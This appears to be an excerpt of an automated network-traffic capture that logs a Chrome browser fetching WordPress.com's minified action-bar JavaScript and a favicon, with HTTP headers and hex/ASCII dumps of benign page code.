                                                                                                                                                                                                                                                                  Content-Length: 8426
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  x-minify: t
                                                                                                                                                                                                                                                                  x-minify-cache: hit
                                                                                                                                                                                                                                                                  etag: W/15307-1700657605732.8684
                                                                                                                                                                                                                                                                  Expires: Thu, 21 Nov 2024 12:54:23 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 2
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC888INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 77 69 6e 64 6f 77 2e 77 70 63 6f 6d 7c 7c 7b 7d 3b 65 2e 61 63 74 69 6f 6e 62 61 72 3d 7b 7d 3b 65 2e 61 63 74 69 6f 6e 62 61 72 2e 64 61 74 61 3d 77 69 6e 64 6f 77 2e 61 63 74 69 6f 6e 62 61 72 64 61 74 61 3b 63 6f 6e 73 74 20 74 3d 65 2e 61 63 74 69 6f 6e 62 61 72 2e 64 61 74 61 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 3d 7b 7d 2c 6e 3d 28 29 3d 3e 7b 7d 29 7b 69 66 28 21 65 2e 61 63 74 69 6f 6e 29 7b 72 65 74 75 72 6e 7d 66 65 74 63 68 28 74 2e 78 68 72 55 52 4c 2c 7b 6d 65 74 68 6f 64 3a 22 50 4f 53 54 22 2c 62 6f 64 79 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 65 29 2c 68 65 61 64 65 72 73 3a 7b 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f
                                                                                                                                                                                                                                                                  Data Ascii: (function(){const e=window.wpcom||{};e.actionbar={};e.actionbar.data=window.actionbardata;const t=e.actionbar.data;function n(e={},n=()=>{}){if(!e.action){return}fetch(t.xhrURL,{method:"POST",body:new URLSearchParams(e),headers:{"Content-Type":"applicatio
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 74 2e 73 69 74 65 49 44 7d 29 7d 6c 65 74 20 61 3d 77 69 6e 64 6f 77 2e 73 63 72 6f 6c 6c 59 7c 7c 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 7c 7c 30 3b 69 66 28 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 74 6f 70 29 7b 72 65 74 75 72 6e 7d 63 6f 6e 73 74 20 6c 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 61 63 74 69 6f 6e 62 61 72 22 29 3b 69 66 28 21 6c 29 7b 72 65 74 75 72 6e 7d 6c 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 73 74 79 6c 65 22 29 3b 69 66 28 74 2e 73 74 61 74 75 73 4d 65 73 73 61 67 65 29 7b 54 28 74 2e 73 74 61 74 75 73 4d 65 73 73 61 67 65 29 7d 6c 65 74 20 64 3d 66 61 6c 73 65 3b 63 6f 6e 73 74 20 75 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d
                                                                                                                                                                                                                                                                  Data Ascii: t.siteID})}let a=window.scrollY||window.pageYOffset||0;if(window!=window.top){return}const l=document.querySelector("#actionbar");if(!l){return}l.removeAttribute("style");if(t.statusMessage){T(t.statusMessage)}let d=false;const u=l.querySelector(".actnbr-
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 69 63 6b 22 2c 65 3d 3e 7b 69 28 22 63 6f 6d 6d 65 6e 74 5f 63 6c 69 63 6b 65 64 22 29 3b 24 28 22 77 70 63 6f 6d 5f 61 63 74 69 6f 6e 62 61 72 5f 63 6f 6d 6d 65 6e 74 5f 63 6c 69 63 6b 22 2c 7b 75 72 6c 3a 74 2e 73 69 74 65 55 52 4c 2c 62 6c 6f 67 5f 69 64 3a 74 2e 73 69 74 65 49 44 2c 70 6f 73 74 5f 69 64 3a 74 2e 70 6f 73 74 49 44 7d 29 7d 29 7d 69 66 28 5f 29 7b 5f 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 65 3d 3e 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 63 6f 6e 73 74 20 6e 3d 65 2e 74 61 72 67 65 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 69 73 2d 63 68 65 63 6b 65 64 22 29 3b 63 6f 6e 73 74 20 6f 3d 60 2f 72 65 61 64 2f 73 69 74 65 73
                                                                                                                                                                                                                                                                  Data Ascii: ick",e=>{i("comment_clicked");$("wpcom_actionbar_comment_click",{url:t.siteURL,blog_id:t.siteID,post_id:t.postID})})}if(_){_.addEventListener("click",e=>{e.preventDefault();const n=e.target.parentElement.classList.toggle("is-checked");const o=`/read/sites
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 6f 73 74 49 44 7d 29 7d 29 7d 63 6f 6e 73 74 20 71 3d 28 65 2c 6e 29 3d 3e 7b 79 2e 66 6f 72 45 61 63 68 28 65 3d 3e 65 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 69 73 2d 73 65 6c 65 63 74 65 64 22 29 29 3b 65 2e 74 61 72 67 65 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 69 73 2d 73 65 6c 65 63 74 65 64 22 29 3b 63 6f 6e 73 74 20 6f 3d 60 2f 72 65 61 64 2f 73 69 74 65 2f 24 7b 74 2e 73 69 74 65 49 44 7d 2f 70 6f 73 74 5f 65 6d 61 69 6c 5f 73 75 62 73 63 72 69 70 74 69 6f 6e 73 2f 75 70 64 61 74 65 60 3b 73 28 6f 2c 22 72 65 73 74 2f 76 31 2e 32 22 2c 7b 64 65 6c 69 76 65 72 79 5f 66 72 65 71 75 65 6e 63 79 3a 6e 7d 29 7d 3b 69 66 28 79 2e 6c 65 6e 67
                                                                                                                                                                                                                                                                  Data Ascii: ostID})})}const q=(e,n)=>{y.forEach(e=>e.parentElement.classList.remove("is-selected"));e.target.parentElement.classList.add("is-selected");const o=`/read/site/${t.siteID}/post_email_subscriptions/update`;s(o,"rest/v1.2",{delivery_frequency:n})};if(y.leng
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 62 74 6e 22 29 3b 69 66 28 64 26 26 21 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 61 63 74 6e 62 72 2d 68 69 64 64 65 6e 22 29 29 7b 64 3d 66 61 6c 73 65 3b 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 61 63 74 6e 62 72 2d 68 69 64 64 65 6e 22 29 7d 7d 29 3b 63 6f 6e 73 74 20 53 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d 73 68 6f 72 74 6c 69 6e 6b 20 61 22 29 3b 69 66 28 53 29 7b 53 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 65 3d 3e 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 69 66 28 77 69 6e 64 6f 77 2e 65 6c 65 63 74 72 6f 6e 29 7b 77 69 6e 64 6f 77 2e 65 6c 65 63 74 72 6f 6e 2e 73 65 6e 64 28 22 63 6f 70 79 2d 74 65 78 74 2d 74 6f 2d 63
                                                                                                                                                                                                                                                                  Data Ascii: btn");if(d&&!n.classList.contains("actnbr-hidden")){d=false;n.classList.add("actnbr-hidden")}});const S=l.querySelector(".actnbr-shortlink a");if(S){S.addEventListener("click",e=>{e.preventDefault();if(window.electron){window.electron.send("copy-text-to-c
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 64 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 73 74 61 74 73 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 73 74 61 74 73 22 29 3b 78 28 22 2e 66 6c 62 2d 72 65 70 6f 72 74 20 61 22 2c 22 72 65 70 6f 72 74 65 64 5f 63 6f 6e 74 65 6e 74 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 66 6f 6c 6c 6f 77 73 20 61 22 2c 22 6d 61 6e 61 67 65 64 5f 66 6f 6c 6c 6f 77 69 6e 67 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 6c 6f 67 69 6e 2d 6e 75 64 67 65 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 6c 6f 67 69 6e 5f 6e 75 64 67 65 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 73 69 67 6e 75 70 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 73 69 67 6e 75 70 5f 6c 69 6e 6b 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 6c 6f 67 69 6e 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 6c 6f 67 69 6e 5f 6c 69 6e 6b 22
                                                                                                                                                                                                                                                                  Data Ascii: d");x(".actnbr-stats a","clicked_stats");x(".flb-report a","reported_content");x(".actnbr-follows a","managed_following");x(".actnbr-login-nudge a","clicked_login_nudge");x(".actnbr-signup a","clicked_signup_link");x(".actnbr-login a","clicked_login_link"
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC693INData Raw: 65 2e 74 69 6d 65 53 74 61 6d 70 5d 3d 74 72 75 65 3b 6f 2e 74 61 72 67 65 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 7d 69 28 65 2c 63 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 29 7b 63 6f 6e 73 74 20 65 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d 66 6f 6c 6c 6f 77 2d 62 75 62 62 6c 65 20 66 6f 72 6d 22 29 3b 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 73 74 79 6c 65 22 29 3b 63 6f 6e 73 74 20 74 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d 61 63 74 6e 2d 66 6f 6c 6c 6f 77 22 29 3f 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 74 26 26 74 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 61 63 74 6e 62 72 2d 68 69 64 64 65 6e 22 29 3b 73 65 74 54 69 6d 65 6f 75 74 28
                                                                                                                                                                                                                                                                  Data Ascii: e.timeStamp]=true;o.target.dispatchEvent(e)}i(e,c)}}function M(){const e=l.querySelector(".actnbr-follow-bubble form");e.removeAttribute("style");const t=l.querySelector(".actnbr-actn-follow")?.parentNode;t&&t.classList.toggle("actnbr-hidden");setTimeout(


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  38192.168.2.1649752192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC388OUTGET /wp-content/mu-plugins/actionbar/actionbar.js?v=20231122 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s0.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC481INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:45 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                                                  Content-Length: 8426
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  x-minify: t
                                                                                                                                                                                                                                                                  x-minify-cache: hit
                                                                                                                                                                                                                                                                  etag: W/15307-1700657606033.2854
                                                                                                                                                                                                                                                                  Expires: Thu, 21 Nov 2024 12:55:08 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 1
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC888INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 77 69 6e 64 6f 77 2e 77 70 63 6f 6d 7c 7c 7b 7d 3b 65 2e 61 63 74 69 6f 6e 62 61 72 3d 7b 7d 3b 65 2e 61 63 74 69 6f 6e 62 61 72 2e 64 61 74 61 3d 77 69 6e 64 6f 77 2e 61 63 74 69 6f 6e 62 61 72 64 61 74 61 3b 63 6f 6e 73 74 20 74 3d 65 2e 61 63 74 69 6f 6e 62 61 72 2e 64 61 74 61 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 3d 7b 7d 2c 6e 3d 28 29 3d 3e 7b 7d 29 7b 69 66 28 21 65 2e 61 63 74 69 6f 6e 29 7b 72 65 74 75 72 6e 7d 66 65 74 63 68 28 74 2e 78 68 72 55 52 4c 2c 7b 6d 65 74 68 6f 64 3a 22 50 4f 53 54 22 2c 62 6f 64 79 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 65 29 2c 68 65 61 64 65 72 73 3a 7b 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f
                                                                                                                                                                                                                                                                  Data Ascii: (function(){const e=window.wpcom||{};e.actionbar={};e.actionbar.data=window.actionbardata;const t=e.actionbar.data;function n(e={},n=()=>{}){if(!e.action){return}fetch(t.xhrURL,{method:"POST",body:new URLSearchParams(e),headers:{"Content-Type":"applicatio
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: 74 2e 73 69 74 65 49 44 7d 29 7d 6c 65 74 20 61 3d 77 69 6e 64 6f 77 2e 73 63 72 6f 6c 6c 59 7c 7c 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 7c 7c 30 3b 69 66 28 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 74 6f 70 29 7b 72 65 74 75 72 6e 7d 63 6f 6e 73 74 20 6c 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 61 63 74 69 6f 6e 62 61 72 22 29 3b 69 66 28 21 6c 29 7b 72 65 74 75 72 6e 7d 6c 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 73 74 79 6c 65 22 29 3b 69 66 28 74 2e 73 74 61 74 75 73 4d 65 73 73 61 67 65 29 7b 54 28 74 2e 73 74 61 74 75 73 4d 65 73 73 61 67 65 29 7d 6c 65 74 20 64 3d 66 61 6c 73 65 3b 63 6f 6e 73 74 20 75 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d
                                                                                                                                                                                                                                                                  Data Ascii: t.siteID})}let a=window.scrollY||window.pageYOffset||0;if(window!=window.top){return}const l=document.querySelector("#actionbar");if(!l){return}l.removeAttribute("style");if(t.statusMessage){T(t.statusMessage)}let d=false;const u=l.querySelector(".actnbr-
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: 69 63 6b 22 2c 65 3d 3e 7b 69 28 22 63 6f 6d 6d 65 6e 74 5f 63 6c 69 63 6b 65 64 22 29 3b 24 28 22 77 70 63 6f 6d 5f 61 63 74 69 6f 6e 62 61 72 5f 63 6f 6d 6d 65 6e 74 5f 63 6c 69 63 6b 22 2c 7b 75 72 6c 3a 74 2e 73 69 74 65 55 52 4c 2c 62 6c 6f 67 5f 69 64 3a 74 2e 73 69 74 65 49 44 2c 70 6f 73 74 5f 69 64 3a 74 2e 70 6f 73 74 49 44 7d 29 7d 29 7d 69 66 28 5f 29 7b 5f 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 65 3d 3e 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 63 6f 6e 73 74 20 6e 3d 65 2e 74 61 72 67 65 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 69 73 2d 63 68 65 63 6b 65 64 22 29 3b 63 6f 6e 73 74 20 6f 3d 60 2f 72 65 61 64 2f 73 69 74 65 73
                                                                                                                                                                                                                                                                  Data Ascii: ick",e=>{i("comment_clicked");$("wpcom_actionbar_comment_click",{url:t.siteURL,blog_id:t.siteID,post_id:t.postID})})}if(_){_.addEventListener("click",e=>{e.preventDefault();const n=e.target.parentElement.classList.toggle("is-checked");const o=`/read/sites
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: 6f 73 74 49 44 7d 29 7d 29 7d 63 6f 6e 73 74 20 71 3d 28 65 2c 6e 29 3d 3e 7b 79 2e 66 6f 72 45 61 63 68 28 65 3d 3e 65 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 69 73 2d 73 65 6c 65 63 74 65 64 22 29 29 3b 65 2e 74 61 72 67 65 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 69 73 2d 73 65 6c 65 63 74 65 64 22 29 3b 63 6f 6e 73 74 20 6f 3d 60 2f 72 65 61 64 2f 73 69 74 65 2f 24 7b 74 2e 73 69 74 65 49 44 7d 2f 70 6f 73 74 5f 65 6d 61 69 6c 5f 73 75 62 73 63 72 69 70 74 69 6f 6e 73 2f 75 70 64 61 74 65 60 3b 73 28 6f 2c 22 72 65 73 74 2f 76 31 2e 32 22 2c 7b 64 65 6c 69 76 65 72 79 5f 66 72 65 71 75 65 6e 63 79 3a 6e 7d 29 7d 3b 69 66 28 79 2e 6c 65 6e 67
                                                                                                                                                                                                                                                                  Data Ascii: ostID})})}const q=(e,n)=>{y.forEach(e=>e.parentElement.classList.remove("is-selected"));e.target.parentElement.classList.add("is-selected");const o=`/read/site/${t.siteID}/post_email_subscriptions/update`;s(o,"rest/v1.2",{delivery_frequency:n})};if(y.leng
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: 62 74 6e 22 29 3b 69 66 28 64 26 26 21 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 61 63 74 6e 62 72 2d 68 69 64 64 65 6e 22 29 29 7b 64 3d 66 61 6c 73 65 3b 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 61 63 74 6e 62 72 2d 68 69 64 64 65 6e 22 29 7d 7d 29 3b 63 6f 6e 73 74 20 53 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d 73 68 6f 72 74 6c 69 6e 6b 20 61 22 29 3b 69 66 28 53 29 7b 53 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 65 3d 3e 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 69 66 28 77 69 6e 64 6f 77 2e 65 6c 65 63 74 72 6f 6e 29 7b 77 69 6e 64 6f 77 2e 65 6c 65 63 74 72 6f 6e 2e 73 65 6e 64 28 22 63 6f 70 79 2d 74 65 78 74 2d 74 6f 2d 63
                                                                                                                                                                                                                                                                  Data Ascii: btn");if(d&&!n.classList.contains("actnbr-hidden")){d=false;n.classList.add("actnbr-hidden")}});const S=l.querySelector(".actnbr-shortlink a");if(S){S.addEventListener("click",e=>{e.preventDefault();if(window.electron){window.electron.send("copy-text-to-c
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: 64 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 73 74 61 74 73 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 73 74 61 74 73 22 29 3b 78 28 22 2e 66 6c 62 2d 72 65 70 6f 72 74 20 61 22 2c 22 72 65 70 6f 72 74 65 64 5f 63 6f 6e 74 65 6e 74 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 66 6f 6c 6c 6f 77 73 20 61 22 2c 22 6d 61 6e 61 67 65 64 5f 66 6f 6c 6c 6f 77 69 6e 67 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 6c 6f 67 69 6e 2d 6e 75 64 67 65 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 6c 6f 67 69 6e 5f 6e 75 64 67 65 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 73 69 67 6e 75 70 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 73 69 67 6e 75 70 5f 6c 69 6e 6b 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 6c 6f 67 69 6e 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 6c 6f 67 69 6e 5f 6c 69 6e 6b 22
                                                                                                                                                                                                                                                                  Data Ascii: d");x(".actnbr-stats a","clicked_stats");x(".flb-report a","reported_content");x(".actnbr-follows a","managed_following");x(".actnbr-login-nudge a","clicked_login_nudge");x(".actnbr-signup a","clicked_signup_link");x(".actnbr-login a","clicked_login_link"
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC693INData Raw: 65 2e 74 69 6d 65 53 74 61 6d 70 5d 3d 74 72 75 65 3b 6f 2e 74 61 72 67 65 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 7d 69 28 65 2c 63 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 29 7b 63 6f 6e 73 74 20 65 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d 66 6f 6c 6c 6f 77 2d 62 75 62 62 6c 65 20 66 6f 72 6d 22 29 3b 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 73 74 79 6c 65 22 29 3b 63 6f 6e 73 74 20 74 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d 61 63 74 6e 2d 66 6f 6c 6c 6f 77 22 29 3f 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 74 26 26 74 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 61 63 74 6e 62 72 2d 68 69 64 64 65 6e 22 29 3b 73 65 74 54 69 6d 65 6f 75 74 28
                                                                                                                                                                                                                                                                  Data Ascii: e.timeStamp]=true;o.target.dispatchEvent(e)}i(e,c)}}function M(){const e=l.querySelector(".actnbr-follow-bubble form");e.removeAttribute("style");const t=l.querySelector(".actnbr-actn-follow")?.parentNode;t&&t.classList.toggle("actnbr-hidden");setTimeout(


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  39192.168.2.1649753192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC346OUTGET /i/favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s1.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC495INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:45 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/x-icon
                                                                                                                                                                                                                                                                  Content-Length: 15406
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Last-Modified: Thu, 18 Apr 2024 07:27:55 GMT
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  ETag: "6620cb7b-3c2e"
                                                                                                                                                                                                                                                                  Expires: Fri, 18 Apr 2025 07:35:12 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 2
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC874INData Raw: 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 c6 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 01 ec 5b 3a 35 e9 58 39 99 e9 58 38 d9 e9 59 38 f9 e9 59 38 f9 e9 58 38 db e9 58 39 99 e7 57 3a 35 ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ea 55 40 0c e8 59 38 9a e9 59 38 f9 e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 38 fa e9 58 39 99 eb 4e 3b 0d 00 00 00 00 00 00 00 00 00 00 00 00 eb 62 3b 0d e9 58 39 bc e9 58 38 ff e9 58 38 ff ec 75 5b ff f3 ab 9b ff f5 b6 a8 ff f5
                                                                                                                                                                                                                                                                  Data Ascii: h6 (00 h&( [:5X9X8Y8Y8X8X9W:5U@Y8Y8X8X8X8X8X8X8Y8X9N;b;X9X8X8u[
